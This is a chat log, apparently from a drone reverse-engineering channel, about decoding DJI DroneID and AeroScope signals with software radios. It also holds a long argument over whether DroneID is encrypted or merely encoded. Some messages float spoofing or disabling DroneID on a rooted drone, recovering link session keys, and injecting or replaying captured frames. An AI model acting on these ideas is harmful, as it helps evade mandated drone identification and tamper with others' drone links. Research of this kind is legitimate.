111c02003f3f0000000000000f0e0100010000003f3f000000000000df chId: 2 seqNbr: 155 size: 29 data: 111c02603f3f000000000000100f0100010000003f3f0000000000000b chId: 2 seqNbr: 156 size: 29 data: 121c02003f3f0000000000003f3f0000000000003f3f0000000000001e chId: 2 seqNbr: 157 size: 29 data: 111c02003f3f00000000000011100100010000003f3f00000000000057 chId: 2 seqNbr: 158 size: 29 data: 111c02003f3f00000000000012110100010000003f3f0000000000005a chId: 2 seqNbr: 159 size: 29 data: 111c02003f3f00000000000013120100010000003f3f0000000000004f chId: 2 seqNbr: 160 size: 29 data: 111c02603f3f00000000000014130100010000003f3f00000000000097 chId: 2 seqNbr: 161 size: 29 data: 111c02603f3f00000000000015140100010000003f3f000000000000b0 chId: 2 seqNbr: 162 size: 29 data: 111c02603f3f00000000000016150100010000003f3f000000000000bd chId: 2 seqNbr: 163 size: 29 data: 111c02603f3f00000000000017160100010000003f3f000000000000a8 chId: 2 seqNbr: 164 size: 29 data: 111c02003f3f00000000000019170100030000003f3f00000000000028 chId: 2 seqNbr: 165 size: 36 data: 1a238201000000000000000300000041f7d607b08b1da696373ffc8902f33be9113c41e8

[2022-02-28 17:40:07] nopexecutor : this is just one channel, there is another control one sending mostly the same stuff all the time, up to the point of drone & RC sync (with sporadic freq change requests)

[2022-02-28 17:40:56] nopexecutor : from that point on encrypted communication starts, DUML & video channels also get active

[2022-02-28 17:46:18] nopexecutor : hm, in the first longer pairing packet I can see "31e2" -> maybe 0xe231, meaning MA2?

[2022-02-28 17:46:41] nopexecutor : I would need to x-check what is the rest of the packet before sharing...

[2022-03-02 06:39:24] alex1122334432 : alex1122334432 joined the channel.

[2022-03-03 15:05:42] gh : ghartabc joined the channel.

[2022-03-13 09:02:35] zgvs2 : zgvs2 joined the channel.

[2022-03-15 05:04:33] valtgun : valtgun joined the channel.

[2022-03-20 07:33:35] zwon : zwon joined the channel.

[2022-03-23 14:56:44] skyninja : Maybe a bit off topic, but related to rev eng and drone metadata. There are some videos on Internet from the Russian Orlan-10 drone. On the top and bottom of the frame, there is a black/white pixel bar. I assume this is their way to encode digital metadata (where is the drone flying, what is its sensor point of interest, etc) in an analog video transmission. It seems like 4 lines of 184 (not entirely sure) "pixels". It starts with a pattern 0101010101010101. It ends with 16 bits that change a lot, probably that is some form of CRC or checksum. I "demodulated" the "pixels" to bits. I am now trying to find out what is used for checksum/CRC16 in the last bits. But so far I have not been successful. Have other people looked at this?

[2022-03-23 14:56:44] skyninja : Maybe a bit off topic, but related to rev eng and drone metadata. There are some videos on Internet from the Russian Orlan-10 drone. On the top and bottom of the frame, there is a black/white pixel bar. I assume this is their way to encode digital metadata (where is the drone flying, what is its sensor point of interest, etc) in an analog video transmission. It seems like 4 lines of 184 (not entirely sure) "pixels". It starts with a pattern 0101010101010101. It ends with 16 bits that change a lot, probably that is some form of CRC or checksum. I "demodulated" the "pixels" to bits. I am now trying to find out what is used for checksum/CRC16 in the last bits. But so fare I have no been successful. Have other people looked at this?

[2022-03-23 14:59:15] skyninja : There are the bytes I extract from a video clip. 4 times 184 bits concatenated. Every line is a different frame.

[2022-03-23 15:00:51] skyninja : I assume black = 0, white = 1, because there are long lines of black, assuming all zeros. Also assume no scrambler, because of the long black lines.

[2022-03-23 19:55:38] konraditurbe : konraditurbe joined the channel.

[2022-03-23 20:02:38] hostile : hostile joined the channel.

[2022-03-23 20:22:37] loaderbull : loaderbull joined the channel.

[2022-03-23 22:20:46] uskve : uskve joined the channel.

[2022-03-24 04:11:41] mrbou : mrbou joined the channel.

[2022-03-24 04:31:48] seraph1573 : seraph1573 joined the channel.

[2022-03-24 05:33:20] hostile : @skyninja ... this outta help. Before I drag the channel back on topic. https://twitter.com/Crypt0s/status/1506727236631674882

[2022-03-24 05:33:31] hostile : https://twitter.com/d0tslash/status/1506724514490732551?s=20&t=Ka9mGV6PFqumQhWURkUWAQ

[2022-03-24 05:37:42] hostile : Ok now, back on topic with Aeroscope...

[2022-03-24 05:40:54] hostile : Does anyone have this AeroScope CrystalSky firmware image all extracted, decrypted, whatever? I'm lazy. https://docs.djicdn.com/Products+info/ZS600C_V2597.zip

[2022-03-24 05:44:25] hostile : So reading the backlog it seems several of you had varying degrees of success decoding the LightBridge, or Occusync DroneID packets with an SDR? DJI is claiming in this article that DroneID is "encrypted". https://www.theverge.com/22985101/dji-aeroscope-ukraine-russia-drone-tracking. I reached out to the journo and said that was not correct last I knew. DJi engineering reasserted that it *was*.

[2022-03-24 05:45:09] hostile : https://twitter.com/d0tslash/status/1506689838216581125

[2022-03-24 05:45:26] hostile :

[2022-03-24 05:46:02] hostile :

[2022-03-24 05:46:25] hostile : On the Enhanced Wifi, when I wrote that paper, they 100% were not "encrypted", when did that change? or is it just a misunderstanding ?

[2022-03-24 05:47:09] hostile : I personally suspect it to be them not understanding their own hardware / marketing: "Data Security – All data transmitted through OcuSync 2.0 is encrypted using the leading AES-256 standard, ensuring critical mission information is protected and can only be accessed by authorized parties." https://www.dji.com/newsroom/news/dji-improves-enterprise-drones-and-fleet-management-software-to-enable-next-level-commercial-drone-operations

[2022-03-24 05:48:30] hostile : I understand DroneID to be both unencrypted, and broadcast parallel to the actual encrypted c2 link. If it wasn't they'd have to be offering vendors decryption keys in their 'open' standard in order to receive the packets. AeroScope would similarly have to have keys. Now I agree they should maybe try signing the packets, but that is a differnt story. They are not encrypted, correct?

[2022-03-24 05:48:44] hostile : @icer come read this backlog...

[2022-03-24 06:57:20] skyninja : drone id in ocusync is not encrypted.

[2022-03-24 06:58:17] hostile : any subjective proof? DJI is arguing otherwise

[2022-03-24 06:58:17] hostile : any non-subjective proof? DJI is arguing otherwise

[2022-03-24 07:00:18] skyninja : yes, i can demodulate it so i know it.

[2022-03-24 07:02:05] skyninja : droneid is a different signal on a different frequency than uplink and downlink. it is a frame transmitted every 640 ms. A frame is around 600 us.

[2022-03-24 07:20:06] skyninja : if you send an RF sample, i will demodulate it for you, then you now it is true.

[2022-03-24 07:48:34] skyninja : i think they see it just like wi-fi, wi-fi is AES encrypted but the management beacon frame is not. but general speaking wi-fi is encrypted.

[2022-03-24 08:02:21] the_lord : Yes WiFi is encrypted but the droneID beacon over WiFi is not, unless if they consider the DUML an encryption :D

[2022-03-24 08:47:44] thatdroneguy-uk : thatdroneguy-uk joined the channel.

[2022-03-24 09:27:01] skyninja : The article in The Verge seems to have soften their wording. The word "encrypted" is now removed for most part.

[2022-03-24 09:44:19] konraditurbe : don't see why it matters that its encrypted, dji keeps saying this thinking it matters, don't the Russians have aeroscope HW *with the (supposed) decryption key*? The problem is proliferation of these things due to dealers with no scruples.

[2022-03-24 09:47:05] skyninja : The best mitigation: don't use DJI drones. :grinning:

[2022-03-24 11:11:48] dkovar : Speaking as Kovar, for the purposes of the general public, it is encrypted. You need a SDR, and then you need to extract the data, and then you need to make sense of it. Like the early logs, the data is probably encoded and not encrypted. It is certainly not broadcast "in the clear". Getting into this sort of nuance in the article wasn't going to happen. That said, I would love to see how it is decoded for human consumption so that I can communicate this correctly the next time. And, finally, the real problem is that a) the data is in the C2 link and b) anyone, and particularly a nation state, can extract it if they want. Encrypted, or encoded, or just difficult to get really isn't the issue.

[2022-03-24 11:12:47] dkovar : Proving that DJI got their language "wrong" is all well and good but preventing the "feature" from working is much more important.

[2022-03-24 11:15:26] dkovar : And lest anyone thinks I turned into a DJI fanboy, that is hardly the case. I am more interested in accurately describing a wide variety of issues relating to DJI -and many other firms- and trying to align policy and regulation with the facts rather than with politician's desires to score points.

[2022-03-24 11:17:09] dkovar : DUML is encoding, not encryption. DUML within Wifi is pretty close to encryption for the vast majority of the population. Technically it is not encrypted, for the purposes of an article for the general public, the data is encrypted.

[2022-03-24 11:26:08] konraditurbe : If the data is in the C2 link, can theoretically an Aeroscope unit be able to extract the video feed? Or those DUML packets are not within reach?

[2022-03-24 12:14:06] skyninja : From 1-1-2023 every drone with CE label above 250g needs to transmit drone id. Of course this was not designed with using consumer drones for warfare in mind.

[2022-03-24 12:14:06] skyninja : From 1-1-2023 every drone with CE label above 250g needs to transmit drone id. Of course this was not design with using consumer drones for warfare in mind.

[2022-03-24 12:14:26] skyninja : In the European Union.

[2022-03-24 12:16:02] konraditurbe : Wonder what the EU ruling says about exceptions to this rule. Anybody with a smartphone can see your drone location.

[2022-03-24 12:17:02] dkovar : The US RemoteID requirement is scheduled for 2023 as well. There is a lawsuit trying to stop it, we'll see. Can "anyone with a smartphone" really see your location? That is certainly a huge concern with RemoteID. It is supposed to be available only to LE.

[2022-03-24 12:18:00] skyninja : Yes within line of sight and propagation limits.

[2022-03-24 12:22:22] konraditurbe : Check video I sent to general

[2022-03-24 12:22:39] konraditurbe : not your (rc) location but rather drone location

[2022-03-24 12:36:35] hostile : sorry I fell asleep! did I miss anything fun here?

[2022-03-24 12:38:44] hostile : 'for the purposes of the general public, it is encrypted. You need a SDR, and then you need to extract the data, and then you need to make sense of it.' @dkovar respectfully, that isn't encrypted. At best it is "encoded". =] I can see the confusion. But being laypeople doesn't make something magically be encrypted because you don't understand it. One could say that "Spanish" is encrypted English by that logic. From an EW standpoint there is a huge difference between encoding and encryption.

[2022-03-24 12:39:27] hostile : 'It is certainly not broadcast "in the clear".' encoded data that is hard to decipher for a layperson is *still* "in the clear" from a pedantically technical standpoint.

[2022-03-24 12:40:18] hostile : ' a) the data is in the C2 link' also to be clear it is parallel to the c2 link run over the same pipe.

[2022-03-24 12:41:25] hostile : But yes... they obviously said it was encrypted to soften the data / privacy issue and make it less of a concern. They are technically, and factually incorrect in that regard. It is indeed a parallel issue amongst the other concerns.

[2022-03-24 12:42:19] hostile : "If the data is in the C2 link, can theoretically an Aeroscope unit be able to extract the video feed?", nailed it @konraditurbe . I don't think they understand their own protocols enough to get a Chinese to English translation out to Adam. IMHO.

[2022-03-24 12:42:19] hostile : "If the data is in the C2 link, can theoretically an Aeroscope unit be able to extract the video feed?", nailed it @konraditurbe . I don't they understand their own protocols enough to get a Chinese to English translation out to Adam. IMHO.

[2022-03-24 12:42:40] hostile : do you have any details on this lawsuit David? I'd bekeep to know more about that.

[2022-03-24 12:42:46] konraditurbe : Its all just too confusing

[2022-03-24 12:43:17] hostile : *intentionally* IMHO. To make it look less ominous than it is. "We only give it to police! and it's encrypted, why worry!?"

[2022-03-24 13:10:22] dkovar : Pedantically technical is fine in this environment. It is counter productive when talking with the public, regulators, or lawmakers. DJI understands their own protocols very well. Adam probably does not. Even if he does, he suffers from the same problem that I do - making a deeply technical issue simple enough for a journalist to convey to the public. Arguing, or doing presentations about, encrypted vs not will only engage with people who care about those fine details. If you want to effect change, you need to communicate in broader terms. With that in mind, I stand by my statement that, for almost everyone, the data is encrypted.

[2022-03-24 13:10:39] dkovar : The lawsuit is Race Day Quads vs FAA.

[2022-03-24 13:12:48] dkovar : It is confusing because it IS confusing. Lots of moving parts, different versions, interactions, etc. Any normal person will have konraditurbe's response - it is all too confusing. And if you go there, you've lost them. If you lose the audience you are trying to convince because of nuance and technical details then much of your effort is wasted.

[2022-03-24 13:14:23] hostile : "t is counter productive when talking with the public, regulators, or lawmakers." to have DJI bold faced lie to peoples faces and claim their technology is encrypted as some sort of risk mitigation? I'd argue otherwise.

[2022-03-24 13:14:41] konraditurbe : Yet it doesnt make it any less right to say its encrypted, hinting at some sort of key derivation, vs encoded, which anyone*** (yes technical people) can get decoded with hostile's code.

[2022-03-24 13:14:58] hostile : I've also argued with DJI about IF exploiting lightbridge was possible. Their engineers told Brendan it was impossible. So I'm not entirely sure they actually do in all cases understand their own shit TBH.

[2022-03-24 13:15:30] hostile : doing a presentation about it... lol no. I simply want the words that come out their mouths to be accurate. Period.

[2022-03-24 13:16:36] hostile : "f you want to effect change, you need to communicate in broader terms." just like DJI did... by flat out lying and making their tech seem less of a privacy invasion. I get it. Speaking softly and spreading bullshit is how they got to be the king of DroneID in the first place. That isn't the issue I'm addressing however. I'm just simply checking off boxes.

[2022-03-24 13:16:59] hostile : This is just like them trying to say Sentinel & Supervisor was a program that didn't exist, and was only a proposal. It's softening of a larger issue with words.

[2022-03-24 13:17:19] konraditurbe : @hostile @dkovar how does "Anatomy of DJI Drone Identification Implementation" stand up to today's DJI Aeroscope packets? Any changes? (Apart from travelling on the "c2 link")

[2022-03-24 13:17:26] hostile : "I stand by my statement that, for almost everyone, the data is encrypted." you should not hang your hat there David. It is technically inaccurate, period.

[2022-03-24 13:17:31] dkovar : We've wanted to change their words for years. I am deeply exhausted. It is a fight with no effect. Far better to expend limited resources on efforts that might have a positive outcome.

[2022-03-24 13:17:48] hostile : I'll stand by my words that you are in essence proclaiming that Spanish is Encrypted for English speakers...

[2022-03-24 13:18:12] dkovar : Then I'll walk away and cool off. Back later.

[2022-03-24 13:18:58] hostile : As I understand Konrad there are some new fields.

[2022-03-24 13:20:28] hostile : All I'm asking @dkovar is for you not to be their useful idiot in this case. It is a completely small issue over all, but the words do matter. Spinning encoding, and complexity in understanding packet format is not encryption. On the other hand your early log file example, actually was proper AES encryption. These are fundamentally different concepts. As subject matter experts we can't be out here reciting that encoding is encryption. It makes us look like we don't know what we are talking about.

[2022-03-24 13:21:09] hostile : It makes it look like WE are the ones spreading misinformation, or disinformation. When in reality it is them. Not factually understanding how something works is one thing. Saying something is something it flat out isn't is another.

[2022-03-24 13:21:09] hostile : make it look like WE are the ones spreading misinformation, or disinformation. When in reality it is them. Not factually understanding how something works is one thing. Saying something is something it flat out isn't is another.

[2022-03-24 13:33:31] speatuk : speatuk joined the channel.

[2022-03-24 13:38:27] hostile : just to wrap this up before I go back to thinking proper technical. The reason *why* it matters isn't because of regulation. Pay very close attention to the question that was pitched, and how the 'encrypted' thing was used to lessen the over all privacy concern.

[2022-03-24 13:40:44] hostile : in essence the argument to the common man, or layperson is: "It is encrypted, and only good guys can read it". Why they want to pitch that image is a completely different topic. could be as simple as they don't want to invest more $$ and engineering time into solving a regulatory headache. Occam & Hanlon's razors are on their side. It isn't necessarily intentionally nefarious, but I guarantee you from this point on, "DroneID is encrypted" will be recited as a reason for regulators to not have concern. Could even be used against the dude with the lawsuit as a reason to shut down his argument.

[2022-03-24 13:41:23] hostile : thanks for sharing that I had not seen it at all. https://www.racedayquads.com/pages/rdq-vs-faa

[2022-03-24 13:41:59] hostile : https://twitter.com/lawfareblog/status/1478134577025724420

[2022-03-24 13:46:21] hostile : in fact directly applicable against their argument.

[2022-03-24 13:46:52] hostile : https://jrupprechtlaw.com/racedayquads-llc-v-faa-lawsuit-challenging-drone-remote-identification-regulations/

[2022-03-24 13:47:53] hostile : damn I missed all of this! https://www.youtube.com/watch?v=2gymmeXH9YI

[2022-03-24 13:50:43] hostile : https://www.youtube.com/watch?v=pfxJRoHOfsw&t=4470s

[2022-03-24 14:54:32] skyninja : In the EU drones have to transmit a drone id in an open protocol by using easy receivable protocol such as wifi and Bluetooth Long Range. So it is designed so that every citizen can see what drone is hovering above his house. It transmits the operator id that every drone operator needs to register. So the law chooses this above privacy. Just like AIS for ships. Just like ADS-B for planes. We can wait for someone to introduce the adsbexchange equivalent for drones. So from privacy standpoint the current DJI solution using proprietary but unencrypted drone id is more privacy friendly than the law from 1-1-2023 onwards.

[2022-03-24 15:05:09] skyninja : Is it a good idea to use consumer drones for artillery adjustments and for recce missions. Well, you accept a know risk if you use DJI drones. The DJI privacy statement that you accept when you start using the product and the whole world can read op their website says that your drone transmits drone ids. Aeroscope product is on the public website. So it is no secret. You accept a risk when you use these consumer drones for military purpose. Can't blame DJI for this. Drone id was made to give law enforcement a tool to keep drones away from airports, prison smuggling and critical infrastructure. Buy a Parrot Anafi with FLIR thermal and your problem is gone.

[2022-03-24 15:06:23] hostile : FWIW ADS-B can be disabled by the pilot, and often is.

[2022-03-24 15:26:10] skyninja : AIS can be switched off as well.

[2022-03-24 16:04:14] dkovar : You tend to have a very clear "either for or against" approach, people are either with you or against. The term "useful idiot" is an example, it allows for little room for other perspectives and approaches. It also really pisses me off and requires me to step back, cool down, and reengage. The identifying data is not transmitted in the clear or encrypted, it is somewhere in the middle. Determining where it is, and why, requires a lot of time and careful choice of language. I know from a lot of direct experience that getting into that level of detail outside of a long form presentation or this sort of forum is essentially impossible. We can choose to argue about the exact term and never achieve consensus. Perhaps we can agree that the average person cannot obtain that data and move on? Most knowledgable readers or listeners will know that there is a level of detail below "encryption" and will engage on those details if necessary. That engagement opens up opportunities to further educate and move the discussion forward. The less knowledgable are harder to reach via this sort of article. What term would you use to describe the protections around the identifying data? "Unencrypted" is probably correct but due to how the data is communicated it is also not transmitted in the clear.

[2022-03-24 16:08:04] dkovar : "It isn't necessarily intentionally nefarious, but I guarantee you from this point on, "DroneID is encrypted" will be recited as a reason for regulators to not have concern. " Ukraine is raising visibility about AeroScopes tremendously. And, when RemoteID comes out, what DJI does, or does not do, will be much less of an issue. What regulators -should- be concerned about this? What DJI is already doing is what the FAA will require -everyone- to do.

[2022-03-24 16:09:02] hostile : "The identifying data is not transmitted in the clear or encrypted, it is somewhere in the middle." something is either encrypted, or not, How can it be in the middle? "we can agree that the average person cannot obtain that data and move on?" I staunchly disagree, on your definition of 'average'.

[2022-03-24 16:09:58] hostile : the article reaches just fine without adding the false claim of encryption seeking to minimize the privacy exposure. The common person we speak of is fooled into thinking "no privacy issue" *shrug*.

[2022-03-24 16:12:28] hostile : regulation is a tangental issue to the overall privacy impact. Speaking factually about minor details only maintains credibility IMHO. It isn't a huge thing to beat a dead horse over. It is pretty black and white. I'm honestly confused as to how techincally we can be discussing any grey area between something being encrypted, vs not. Is there a key or a shared secret, or any secret used? yes, or no. That is your answer.

[2022-03-24 16:13:00] hostile : with DJI as the largest proliferator of drones, yea what they do does matter. Not from a regulation standpoint, but still from a privacy standpoint.

[2022-03-24 16:13:47] hostile : I'm in my basement working right now props off. No one needs to have my DJI product GPS location broadcast to them for ANY reason. *period*. And the fact is ANYONE layperson included can receive the packets, even if it is *difficult* for them to interpret them.

[2022-03-24 16:13:58] hostile : the layperson can't decode ADS-B, but that can go to flighttrader....

[2022-03-24 16:14:17] hostile : https://twitter.com/d0tslash/status/1499515429198434317?s=20&t=SS5GTwM1eXNDm5glbqOSVQ

[2022-03-24 16:14:55] hostile : I'm *pretty* sure the police heli turned off their ADS for their own privacy... because I was live tweeting them following the convoy. This is very similar privacy wise.

[2022-03-24 16:15:46] hostile : ANY idiot can see those packets from that heli. with the right tool put in their hand, because they are not encrypted. DJI droneID implementation in current form is the same. other vendors may be as well at the end of the day. There is lots of discussion to be had on IF this is ok vs. not.

[2022-03-24 16:16:15] dkovar : We can technically discuss the fine details here and I absolutely agree with you. When discussing it with a journalist who is trying to reach a broad audience, I will take a different approach.

[2022-03-24 16:19:00] hostile : for me... the approach for that journalist was to simply omit that claim

[2022-03-24 16:19:14] hostile : adding only harmed credibility, and minimized potential impact to "good guys"

[2022-03-24 16:19:26] hostile : that is literally all this discussion is about

[2022-03-24 16:20:20] hostile : if we need to help the common person understand that reading the encoded data takes a special skill, or for someone to release a public tool, that is fine, but making it sound not possible due to *encryption* is not a good foot for us to be standing on.

[2022-03-24 16:20:28] dkovar : No, that is literally all your discussion is about. That article covered a broad range of topics. How available the data is was only a small piece of it.

[2022-03-24 16:21:14] hostile : the fact remains that I also helped release kismet in public open source format so that literally anyone could receive the information. Kismet will run on an android phone. so in specific cases at the very least the wifi enhanced drones it is already a reality.

[2022-03-24 16:21:31] hostile : "No, that is literally all your discussion is about." what room are we in David? The aeroscope drone ID room.

[2022-03-24 16:21:39] hostile : I've literally been back ONE day...

[2022-03-24 16:21:57] hostile : I also discussed that the article claimed that the sentinel / supervisor program didn't exit.

[2022-03-24 16:22:10] hostile : meanwhile I have written accounts of people that worked in it, and had access to the data.

[2022-03-24 16:22:22] hostile : those were the only two points in the article that I felt needed addressed... the rest of it was fine.

[2022-03-24 16:22:47] hostile : Imma get back to the technical side of the house. I'll eventually provide the public tools to back up my statement, and move on.

[2022-03-24 16:25:01] hostile : it's not a big deal, but I do think we need to be careful dumbing down commentary. And this is a "useful idiot" situation 100%, that wasn't mean to be offensive. It's simply the nature of the term. I could have used a different one, but the fact is you making that comment furthered an agenda that only the "good guys" have access to droneID information, and as such the general public should not worry about their privacy. That stance is hard to debate.

[2022-03-24 16:25:55] hostile : now on the technical side of the house, I did at least get my hackRF up and recieving wifi data. So time to work on getting the 1/4 rate enhanced wifi beacons detected with gnuradio.

[2022-03-24 16:26:00] hostile :

[2022-03-24 16:59:37] skyninja : A screenshot of gnuradio a day keeps the doctor away

[2022-03-24 17:00:32] skyninja : Any reason you do this with gnuradio in stead of setting a wifi chip to 5 Mhz channel width?

[2022-03-24 17:01:53] skyninja : For wifi you have to start with Schmidl-Cox to find start of frame

[2022-03-24 17:17:02] hostile : because only certain wifi chips support this. A small subset of atheros chips.

[2022-03-24 17:17:25] hostile : on USB wifi chips support it.

[2022-03-24 17:17:55] hostile : skyninja I read above you were capturing droneID from occusync? how far along did you get with that?

[2022-03-24 17:18:12] hostile : I'd like to get back to a point where kismet can properly support these packets not just wifi.

[2022-03-24 17:18:40] fredmicrowave : FWIW , Universal Radio Hacker software is really nice

[2022-03-24 17:19:17] fredmicrowave : https://github.com/jopohl/urh

[2022-03-24 17:20:05] fredmicrowave : Works with HackRf ofc

[2022-03-24 17:23:05] hostile : I have hackrf sitting next to me. Yeah I'm just more keen on if @skyninja was able to take droneID samples and decode them to serialnum / gps loc?

[2022-03-24 17:31:06] hostile : looking back I think @tmbinc & @nopexecutor had some similar successes.

[2022-03-24 17:32:01] droneuser : @hostile At the time that you wrote your white paper, DroneID did broadcast in parallel to the C2 link. Now, I am under the impression that they switched to embedding it into the C2 link; however, the packet format is still the same. If you still have an aeroscope mobile unit, you can check on the UART for log messages when a drone is detected - it will list the protocol it detects (Wi-Fi, lightbridge, ocusync) and the RF module/antenna number

[2022-03-24 17:32:15] fredmicrowave : I tried with URH before but could not figure a way get useful info from it. I still have a too much to learn. I have also got a hackRf Mayhem/Portapack, which is great for portable..tests.

[2022-03-24 17:32:48] hostile : what gives you the impression that it is now embedded in the link? Doesn't that imply they can full decode the c2 stream at will? (video and stick data too).

[2022-03-24 17:33:21] droneuser : yeah the internals have all the hardware to decode the C2 stream

[2022-03-24 17:33:46] hostile : that would be a blatant security issue... and implies AeroScope could inject DUML at will.

[2022-03-24 17:34:30] hostile : they'd have had to hardcode a key (or set of keys, or method to derive a key) into all products to enable that.

[2022-03-24 17:34:30] hostile : they'd have had to hardcode a key into all products to enable that.

[2022-03-24 17:34:58] droneuser : i think the at88 chip stores the key

[2022-03-24 17:35:41] hostile : that's certainly not a statement to toss around lightly. Worth some verification, and honestly has much larger security implication if a valid statement.

[2022-03-24 17:36:36] hostile : if that is the case, one lost / rogue Aeroscope would mean entire userbase compromise.

[2022-03-24 17:46:21] konraditurbe : Well, for 749 GBP or ~1k USD you can rent one for a week. https://www.heliguy.com/products/rental-dji-aeroscope-mobile

[2022-03-24 19:12:27] hostile : looks like for now I'll be sorting out hackrf issues for the day. https://github.com/bastibl/gr-ieee802-11/issues/83

[2022-03-24 19:12:58] hostile : "gr::log :INFO: sync_long0 - LONG: frame start at 320" is all I get now =]

[2022-03-24 20:25:17] nopexecutor : In OcuSync2 the droneid packet is not encrypted. The PDU format is similar to the wifi one, but not exactly the same

[2022-03-24 20:27:08] nopexecutor : As to other comms - it depends... they also call the upgraded Phantom 4 Pro V 2.0 comms as Ocusync 2, while the protocol is actually different compared e.g. to Mavic Air 2

[2022-03-24 20:27:49] nopexecutor : First one uses AES128, but not everything is encrypted - if I recall correctly video feed was _not_ encrypted

[2022-03-24 20:28:07] nopexecutor : In MA2 it's AES256, with video feed also encrypted

[2022-03-24 20:30:23] nopexecutor : But in both it's implementation is either stupid, or broken on purpose (in slightly different way...) and in certain conditions it can be decrypted. Session key changes on drone restart, but often can be easily found out...

[2022-03-24 20:33:55] hostile : Lightbridge had similar goofy mistakes that I'm not at liberty to discuss, nor do I fully technically understand. I do know that when we (D13) told DJI staff we could inject DUML into lightbridge their engineering staff said we were lying. :sweat_smile:

[2022-03-24 20:34:25] skyninja : your hackrf problem is probably due to DC Spike. For 1/4 channel you can sample with a 2,5 MHz offset.

[2022-03-24 20:34:34] hostile : yeah that is my assumption as well Sky.

[2022-03-24 21:19:22] fredmicrowave : If it can help : https://www.rtl-sdr.com/removing-that-center-frequency-dc-spike-in-gnuradio-the-easy-way/

[2022-03-24 22:08:48] tmbinc : If you have enough bandwidth, just shift your tuner frequency and shift it back digitally, i.e. introduce an IF.

[2022-03-24 23:27:28] hostile : Looks like for this one, based on model number there is no 2.4ghz. Only 5ghz.

[2022-03-25 01:56:23] hostile : I'm wondering now if an NGFF to USB adapter can be used with older M2 wireless cards like the QCNFA222 https://www.amazon.com/Wireless-Adapter-Module-Testing-Tools/dp/B01NBH4KZM

[2022-03-25 07:20:57] skyninja : You can better focus on outdoor access point you can use to sniff DJI wi-fi drone ids. Whats the use of having a USB dongle on your laptop?

[2022-03-25 07:21:40] skyninja : https://mikrotik.com/product/mantbox_2_12s

[2022-03-25 07:22:12] skyninja : This one is only 2.4GHz band, but has a Atheros chipset you can set to 5 MHz. You can flash OpenWRT on it.

[2022-03-25 07:22:53] skyninja : https://mikrotik.com/product/RB921GS-5HPacD-15S

[2022-03-25 07:24:16] skyninja : This one is 5GHz band. The r3 they now sell cannot be flashed with OpenWRT. But their RouterOS support hopping through a channel list and you can capture the packets and send it to a UDP port. Forgot the protocol it using, but Wireshark supports it out of the box.

[2022-03-25 07:25:48] skyninja : They both have a sector antenna. I hoped to get the same effect as the G8 antenna of the Aeroscope. But unfortunately the range is only a few km.

[2022-03-25 12:26:42] skyninja : I recorded a 5 MHz channel width signal using hackrf_transfer. Its output format is .cs8, so complex signed bytes. I used a offset tuning of 5.5 MHz and a sample rate of 20 MHz. Using this flowgraph, I convert it to complex floats (.cf32), I remove the DC spike, and mix the signal so the signal is centered in the middle. Then I decimate to 5 Msps and write to file. If I read this file in the wifi_rx flowgraph of gr-ieee802.11, I get good decodes in the .pcap file. Note that I do not have an RF sample of a DJI wi-fi drone, so I used another source of 5 MHz channel width wifi.

[2022-03-25 12:29:49] skyninja : Still I recommend the Atheros chip approach and not the gnu radio approach. While this may work in a lab setup, I assume the sensitivity of a hardware Atheros chip is much much better than this gnuradio implementation.

[2022-03-25 12:30:58] skyninja : And a wi-fi access point is much cheaper than HackRF + computer.

[2022-03-25 16:01:15] hostile : "Whats the use of having a USB dongle on your laptop?" historically many people wanted USB access. Having it run on a laptop or ANY device with a USB port is better than commondeering a router. But also using a router is a great idea too! We should make all these things possible.

[2022-03-25 16:02:04] hostile : as long at the cards & firmware support tuning to 1/4 band could 100% use those mikrotiks @skyninja

[2022-03-25 16:02:49] hostile : I'll try to replicate your work today! the firmware on my hackrf was stuck on 2017 and I couldn't get it to speak to gnuradio-companion. I think I have it sorted out now though.

[2022-03-25 16:04:15] hostile : now we need to invert it @skyninja and accept from file-sink and send to wifi_tx from gr-ieee802.11 instead of RX. *evil grin*

[2022-03-25 16:04:59] hostile : don't forget @skyninja that many places have SDR gear that is way better than hackrf... and this base flow graph is useful to integrate into more precise equipment. We were using ETTUS gear at D13 for example.

[2022-03-25 16:05:42] hostile : also may be easier to get HackRFs or other SDR into some folks hands in *certain* situation vs this special Atheros chip.

[2022-03-25 16:06:41] skyninja : but for that price you can just as well buy an Aeroscope.

[2022-03-25 16:07:14] hostile : depends on your goals... and your procurement limitations.

[2022-03-25 16:07:40] hostile : I sure as shit would rather implement a gnuradio flow graph into existing gnuradio platform , as opposed to try to integrate some untrusted .cn device into my workflow

[2022-03-25 16:07:41] the_lord : but with aeroscope you can't replay your captured data ;)

[2022-03-25 23:32:32] hostile : so has anyone considered compiling an app to run on the drones to spoof drone ID via the kernel module? We'd obviously need root on the specific drone in question.

[2022-03-25 23:36:05] joonas : joonas joined the channel.

[2022-03-26 17:57:54] hostile :

[2022-03-26 17:58:24] hostile : going back and comparing https://approveddronepilots.co.uk/wp-content/uploads/2018/05/Anatomy-of-DJI-Drone-ID-Implementation1.pdf to the Mini SE...

[2022-03-26 18:00:16] hostile : they still using adhoc

[2022-03-26 18:00:23] hostile : ```generate random key: %s ```

[2022-03-26 18:00:40] hostile : ```iw dev wlan0 ibss join adhoc %d %02x:%02x:%02x:%02x:%02x:%02x beacon-interval %u key d:0:%s ```

[2022-03-26 18:00:47] hostile : iw dev wlan0 ibss join adhoc %d %02x:%02x:%02x:%02x:%02x:%02x beacon-interval %u key d:0:%s

[2022-03-26 18:02:18] hostile : Can see in dji_network for the mini se

[2022-03-26 18:02:38] hostile :

[2022-03-26 18:08:57] hostile : ath6kl_flight_info_write ath6kl_flight_info_read ath6kl_dji_key_read ath6kl_djiie_read

[2022-03-26 18:10:42] hostile : there we go

[2022-03-26 18:10:54] hostile : just echo 0 to the kernel module? disables the ie on wifi?

[2022-03-26 18:14:20] hostile :

[2022-03-26 18:14:27] hostile : all looks remarkably similar

[2022-03-26 18:37:47] coldflake : Yo bro! That's pretty interesting...I am up for chipping in :)

[2022-03-26 18:41:43] hostile : long time no see.

[2022-03-26 18:42:32] hostile : I need to cop root on this mini SE, but I don't have the current access.

[2022-03-26 21:14:57] faineg : faineg joined the channel.

[2022-03-27 02:35:58] hostile : haha saw this on the file system. A way to change the channel width on the drone.

